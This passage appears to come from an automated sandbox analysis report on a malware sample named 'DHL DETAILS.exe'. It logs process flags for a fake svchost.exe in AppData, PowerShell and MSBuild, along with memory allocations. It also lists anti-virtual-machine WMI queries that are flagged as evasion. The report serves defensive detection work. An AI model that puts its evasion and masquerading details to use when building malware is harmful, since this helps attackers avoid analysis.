Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\DHL DETAILS.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Memory allocated: 28F62430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Memory allocated: 28F7BD90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 17745D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1775F7A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 143DCBD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 143F4BD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 23776360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 23777DA0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1550000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1C6B03F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 1C6C83F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Memory allocated: 1730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Memory allocated: 31E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Memory allocated: 51E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1280000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C50000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4C50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Memory allocated: 15E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
